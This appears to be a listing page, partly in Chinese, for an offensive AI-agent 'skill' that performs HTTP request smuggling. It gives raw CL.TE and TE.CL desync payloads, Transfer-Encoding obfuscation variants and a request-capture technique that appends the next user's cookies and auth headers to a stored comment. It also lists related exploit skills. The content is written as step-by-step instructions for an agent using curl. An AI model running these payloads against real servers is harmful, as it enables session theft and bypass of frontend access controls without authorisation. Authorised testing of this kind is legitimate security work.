一键导入
request-smuggling
HTTP request smuggling via CL.TE/TE.CL desync and cache poisoning
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
菜单
HTTP request smuggling via CL.TE/TE.CL desync and cache poisoning
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
| name | request-smuggling |
| description | HTTP request smuggling via CL.TE/TE.CL desync and cache poisoning |
| origin | RedteamOpencode |
run_tool curl (raw request crafting)Send request with both CL and TE headers: ``` POST / HTTP/1.1 Host: target.com Content-Length: 6 Transfer-Encoding: chunked
0
G
```
If next request gets GPOST → CL.TE confirmed
Time-based: backend waits for more chunked data → timeout difference
Send: ``` POST / HTTP/1.1 Host: target.com Content-Length: 3 Transfer-Encoding: chunked
1
G
0
```
If next request returns unexpected response → TE.CL confirmed
Time-based: backend reads CL bytes only, rest poisons next request
Transfer-Encoding: chunked (standard)Transfer-Encoding : chunked (space before colon)Transfer-Encoding: chunked\r\nTransfer-Encoding: xTransfer-Encoding: x\r\nTransfer-Encoding: chunkedTransfer-Encoding:\tchunked (tab)Transfer-Encoding: chunked (extra space)X: x\r\nTransfer-Encoding: chunked (header injection)TrAnSfEr-EnCoDiNg: chunkedTransfer-Encoding:\n chunked/admin path that frontend blocksSmuggle partial request that captures next user's request: ``` POST /store-comment HTTP/1.1 Content-Length: 400
comment=
```
Next user's request (with cookies/auth) appended to comment body
Read stolen headers from stored location
Business logic vulnerability detection — workflow bypass, price manipulation, state abuse, and application-specific flaws
Detect PII, credentials, and corporate sensitive data in API responses, source code, files, headers, and database extracts
Detect and exploit SQL injection vulnerabilities in web application parameters
Test for authentication and authorization flaws including credential attacks, session issues, and access control bypasses
Detect and exploit cross-site scripting vulnerabilities in web applications
Discover hidden parameters, test values, and identify input handling anomalies